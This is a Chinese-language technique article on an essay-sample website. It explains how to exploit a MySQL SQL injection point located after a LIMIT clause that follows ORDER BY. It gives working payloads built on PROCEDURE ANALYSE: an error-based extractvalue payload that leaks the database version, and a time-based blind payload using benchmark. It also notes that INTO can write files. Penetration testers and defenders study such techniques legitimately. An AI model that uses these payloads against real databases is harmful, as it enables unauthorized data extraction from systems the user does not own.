网站首页  汉语字词  英语词汇  考试资料  写作素材  旧版资料

请输入您要查询的范文:

 

标题 mysql注入点在limit关键字后面利用方法
范文
    描写sql注入利用方法的文章数不胜数,本文将描述一种比较特殊的场景。
    mysql注入点在limit关键字后面的利用方法
    细节
    在一次测试中,我碰到了一个sql注入的问题,在网上没有搜到解决办法,当时的注入点是在limit关键字后面,数据库是mysql5.x,sql语句类似下面这样:
    select field from table where id > 0 order by id limit 【注入点】
    问题的关键在于,语句中有order by 关键字,我们知道,mysql 中在order by 前面可以使用union 关键字,所以如果注入点前面没有order by 关键字,就可以顺利的使用union 关键字,但是现在的情况是,注入点前面有order by 关键字,这个问题在stackoverflow 上和sla.ckers上都有讨论,但是都没有什么有效的解决办法。
    我们先看看 mysql 5.x 的文档中的 select 的语法:
    select
    [all | distinct | distinctrow ]
    [high_priority]
    [straight_join]
    [sql_small_result] [sql_big_result] [sql_buffer_result]
    [sql_cache | sql_no_cache] [sql_calc_found_rows]
    select_expr [, select_expr ...]
    [from table_references
    [where where_condition]
    [group by {col_name | expr | position}
    [asc | desc], ... [with rollup]]
    [having where_condition]
    [order by {col_name | expr | position}
    [asc | desc], ...]
    [limit {[offset,] row_count | row_count offset offset}]
    [procedure procedure_name(argument_list)]
    [into outfile 'file_name' export_options
    | into dumpfile 'file_name'
    | into var_name [, var_name]]
    [for update | lock in share mode]]
    limit 关键字后面还有 procedure 和 into 关键字,into 关键字可以用来写文件,但这在本文中不重要,这里的重点是 procedure 关键字.mysql默认可用的存储过程只有 analyse (doc)。
    尝试用这个存储过程:
    mysql> select field from table where id > 0 order by id limit 1,1 procedure analyse(1);
    error 1386 (hy000): can't use order clause with this procedure
    analyse支持两个参数,试试两个参数:
    mysql> select field from table where id > 0 order by id limit 1,1 procedure analyse(1,1);
    error 1386 (hy000): can't use order clause with this procedure
    依然无效,尝试在 analyse 中插入 sql 语句:
    mysql> select field from table where id > 0 order by id limit 1,1 procedure analyse((select if(mid(version(),1,1) like 5, sleep(5),1)),1);
    响应如下:
    error 1108 (hy000): incorrect parameters to procedure 'analyse’
    事实证明,sleep 没有被执行,最终,我尝试了如下payload :
    mysql> select field from user where id >0 order by id limit 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
    error 1105 (hy000): xpath syntax error: ':5.5.41-0ubuntu0.14.04.1'
    啊哈,上面的方法就是常见的报错注入,所以,如果注入点支持报错,那所有问题都ok,但是如果注入点不是报错的,还可以使用 time-based 的注入,payload 如下:
    select field from table where id > 0 order by id limit 1,1 procedure analyse((select extractvalue(rand(),concat(0x3a,(if(mid(version(),1,1) like 5, benchmark(5000000,sha1(1)),1))))),1)
    有意思的是,这里不能用sleep而只能用 benchmark。
    另外,这里还有一种类似的方法 https://rdot.org/forum/showpost.php?p=36186&postcount=30
随便看

 

在线学习网范文大全提供好词好句、学习总结、工作总结、演讲稿等写作素材及范文模板,是学习及工作的有利工具。

 

Copyright © 2002-2024 cuapp.net All Rights Reserved
更新时间:2025/5/21 4:22:32